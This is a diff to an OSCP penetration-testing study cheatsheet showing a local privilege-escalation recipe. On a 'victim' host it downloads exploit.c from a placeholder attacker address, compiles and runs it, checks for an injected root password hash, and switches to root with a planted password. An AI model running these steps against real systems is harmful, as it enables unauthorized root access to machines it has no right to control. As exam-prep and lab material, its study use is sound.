camercu/oscp-prep/CHEATSHEET.md

 # on victim
 wget LISTEN_IP/exploit.c
-gcc exploit.c -o exploit # may need to compile locally with "-static" ./exploit # if statically compiled, may complain about system() failing, but ok su - # use password 'aaron'
+gcc exploit.c -o exploit # may need to compile locally with "-static" ./exploit # if statically compiled, may complain about system() failing, but might be ok

+# check if exploit worked
+grep root /etc/password # should see hash with 'aaron' salt

+# become r00t
+su - # use password 'aaron'

 # to restore to pre-exploit state